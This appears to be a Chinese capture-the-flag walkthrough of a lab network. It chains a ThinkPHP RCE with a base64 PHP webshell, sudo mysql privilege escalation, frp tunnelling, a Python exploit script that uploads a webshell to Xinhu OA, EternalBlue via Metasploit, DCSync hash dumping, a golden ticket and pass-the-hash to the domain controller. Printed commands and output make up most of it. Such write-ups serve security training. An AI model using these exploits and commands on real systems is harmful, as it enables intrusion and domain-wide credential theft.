入门级靶场,速通一下

fscan扫描外网

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
D:\shentou\fscan>fscan.exe -h 39.99.243.114 -p 1-65535

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
39.99.243.114:22 open
39.99.243.114:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.99.243.114      code:200 len:5578   title:Bootstrap Material Admin
[+] PocScan http://39.99.243.114 poc-yaml-thinkphp5023-method-rce poc1
已完成 2/2
[*] 扫描结束,耗时: 5m11.4893336s

flag1

thinkphp老洞,先一把梭写个马,然后连上蚁剑
alt text

tips:rce时可以这样写马

1
echo 'PD9waHAgZXZhbCgkX1BPU1RbIjEiXSk7ID8+'|base64 -d>shell.php

连上蚁剑终端发现权限比较低,先sudo -l看一下

1
2
3
4
Matching Defaults entries for www-data on ubuntu-web01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu-web01:
    (root) NOPASSWD: /usr/bin/mysql

发现mysql可以有root权限,且免密

查找并读取flag

1
2
sudo mysql -e '\! find / -name flag*'
sudo mysql -e '\! cat /root/flag/flag01.txt'

alt text

上传fscan和frp

ifconfig看到内网IP是172.22.1.15,那么用fscan扫一下这个网段

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.15:22 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.2:445 open
172.22.1.21:139 open
172.22.1.2:139 open
172.22.1.18:139 open
172.22.1.2:88 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:3306 open
[*] WebTitle http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin
[*] NetInfo 
[*]172.22.1.18
   [->]XIAORANG-OA01
   [->]172.22.1.18
[*] NetInfo 
[*]172.22.1.2
   [->]DC01
   [->]172.22.1.2
[*] NetInfo 
[*]172.22.1.21
   [->]XIAORANG-WIN7
   [->]172.22.1.21
[*] NetBios 172.22.1.2      [+] DC:DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393
[*] OsInfo 172.22.1.2	(Windows Server 2016 Datacenter 14393)
[+] MS17-010 172.22.1.21	(Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios 172.22.1.21     XIAORANG-WIN7.xiaorang.lab          Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] NetBios 172.22.1.18     XIAORANG-OA01.xiaorang.lab          Windows Server 2012 R2 Datacenter 9600
[*] WebTitle http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统
[+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1

整理一下信息
外网入口39.99.243.114,其内网IP是172.22.1.15,已经拿下
内网主机172.22.1.2,为域控制器 DC:DC01.xiaorang.lab
内网主机172.22.1.18,为域内主机XIAORANG-OA01.xiaorang.lab,80端口有个信呼协同办公系统
内网主机172.22.1.21,为域内主机XIAORANG-WIN7.xiaorang.lab,存在MS17-010

最后应该是要通过172.22.1.21去打域控的,先把172.22.1.18打了,做一下frp代理

frpc.toml

1
2
3
4
5
6
7
8
9
serverAddr = "xxx.xxx.xxx.xxx"
serverPort = 7000

[[proxies]]
name = "oa"
type = "tcp"
localIP = "172.22.1.18"
localPort = 80
remotePort = 20022

flag2

首页看到是信呼协同办公系统v2.2.8

使用弱密码admin/admin123直接登录
然后就是复现nday

先在exp.py同目录放一个1.php,内容如下

1
<?php eval($_POST[1]);?>

然后exp直接打
exp.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import requests

session = requests.session()
url_pre = 'http://vps:20022/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
data1 = { 'rempass': '0', 'jmpass': 'false', 'device': '1625884034525', 'ltype': '0', 'adminuser': 'YWRtaW4=', 'adminpass': 'YWRtaW4xMjM=', 'yanzm': '' }
r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']

url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3)
data2 = {"1": "system('dir');"}
r = session.post(url_pre + filepath, data=data2)
print(r.text.encode('utf-8'))

从列出的目录里可以找到木马的文件名,直接蚁剑连上即可

alt text

flag3

接下来打172.22.1.21,首先搭一个socks代理

frpc.toml

1
2
3
4
5
6
7
8
[common]
server_addr = xxx.xxx.xxx.xxx
server_port = 7000

[socks5]
type = tcp
plugin = socks5
remote_port = 5000

然后用msf打

1
2
3
4
5
proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

alt text

接下来是横向移动去打域控

想进行DCSync攻击,必须获得以下任一用户的权限:

1
2
3
4
Administrators 组内的用户
Domain Admins 组内的用户
Enterprise Admins 组内的用户域控制器的计算机帐户
即:默认情况下域管理员组具有该权限

这里我们用永恒之蓝打完本来就是system权限,因此可以进行DCSync攻击

利用DCSync

1
load kiwi

导出域内所有用户Hash

1
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
1
2
3
4
5
6
7
8
9
10
11
12
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502     krbtgt  fb812eea13a18b7fcdb8e6d67ddc205b        514
1106    Marcus  e07510a4284b3c97c8e7dee970918c5c        512
1107    Charles f6a9881cd5ae709abb4ac9ab87f24617        512
1000    DC01$   e42fafd0e2581f9949964505dfee032b        532480
500     Administrator   10cf89a850fb1cdbe6bb432b859164c8        512
1104    XIAORANG-OA01$  57db46b9d3f9df2dec50c8deb355e844        4096
1108    XIAORANG-WIN7$  082b914dd550e3f17e88cd82d34f8b34        4096

生成黄金票据

1
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /user:krbtgt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] 'krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   : 
Password last change : 2022/6/5 20:40:39
Object Security ID   : S-1-5-21-314492864-3856862959-4045974917-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: fb812eea13a18b7fcdb8e6d67ddc205b
    ntlm- 0: fb812eea13a18b7fcdb8e6d67ddc205b
    lm  - 0: c4f45322c850c77aecb3aa71c2e44c1e

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 849f7f8ab6eb3b3a1c7c926de5ee5574

* Primary:Kerberos-Newer-Keys *
    Default Salt : XIAORANG.LABkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : acbbedcabc9ad1d8638cda298e15761626e1bce7ce80eae90d95252f8162bba8
      aes128_hmac       (4096) : 207ea00513bdf19042937aa38c9ad2dd
      des_cbc_md5       (4096) : c70ee386138c7016

* Primary:Kerberos *
    Default Salt : XIAORANG.LABkrbtgt
    Credentials
      des_cbc_md5       : c70ee386138c7016

* Packages *
    NTLM-Strong-NTOWF

* Primary:WDigest *
    01  e1108dfe63de9eeca1eefb995e0929bf
    02  20b58dbb0fc4e2b4e2cb7ab85f3e711f
    03  8a758e996035e1bc42ff1632cf94d2f4
    04  e1108dfe63de9eeca1eefb995e0929bf
    05  20b58dbb0fc4e2b4e2cb7ab85f3e711f
    06  17b26c73d1998bf5e4389b6c946375b9
    07  e1108dfe63de9eeca1eefb995e0929bf
    08  44fae0b038a11e0aa22bf9c0bb56fde3
    09  44fae0b038a11e0aa22bf9c0bb56fde3
    10  72d34f6f745066292fc20c2bb9afe9aa
    11  64bb1fe398f58cb09752c6cf99ba38d7
    12  44fae0b038a11e0aa22bf9c0bb56fde3
    13  3a6c03097d06f3d661fab05dd266b8db
    14  64bb1fe398f58cb09752c6cf99ba38d7
    15  066092366aa2d4cac0c40b732c663580
    16  066092366aa2d4cac0c40b732c663580
    17  109ffa596356b70d245729765d970b84
    18  b38c61423c6240cc51e237825b24011f
    19  659c24dbf455331d171d56dee8ce401f
    20  70ac8d2c7e5d33c8b05d05bf48dfc66d
    21  04a52bb90362eb38a60a2a7879232aac
    22  04a52bb90362eb38a60a2a7879232aac
    23  0de96f588c278f0520ce23606f88894b
    24  b3785273258b55001fec33d8adb718d8
    25  b3785273258b55001fec33d8adb718d8
    26  65dcf594b8a0be48f803aba2c8c02fd1
    27  803052ac4fb8934f4aba581e8533fdb5
    28  32b62b5536e1ca61eb0ae7e1fb69f0c9
    29  01cb2d0d07700cbf85f27dcf2d15eee0

导入黄金票据

1
kiwi_cmd kerberos::golden /user:administrator /domain:xiaorang.lab /sid:S-1-5-21-314492864-3856862959-4045974917-502 /krbtgt:fb812eea13a18b7fcdb8e6d67ddc205b /ptt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
User      : administrator
Domain    : xiaorang.lab (XIAORANG)
SID       : S-1-5-21-314492864-3856862959-4045974917-502
User Id   : 500
Groups Id : *513 512 520 518 519 
ServiceKey: fb812eea13a18b7fcdb8e6d67ddc205b - rc4_hmac_nt      
Lifetime  : 2025/7/10 21:21:04 ; 2035/7/8 21:21:04 ; 2035/7/8 21:21:04
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'administrator @ xiaorang.lab' successfully submitted for current session

之前已经获取了Administrator的hash,接下来可以用wmiexec或者crackmapexec来hash传递了

wmiexec哈希传递

1
proxychains python3 wmiexec.py -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang/administrator@172.22.1.2 "type Users\Administrator\flag\flag03.txt"

alt text

完结撒花,耗时1小时22分钟8秒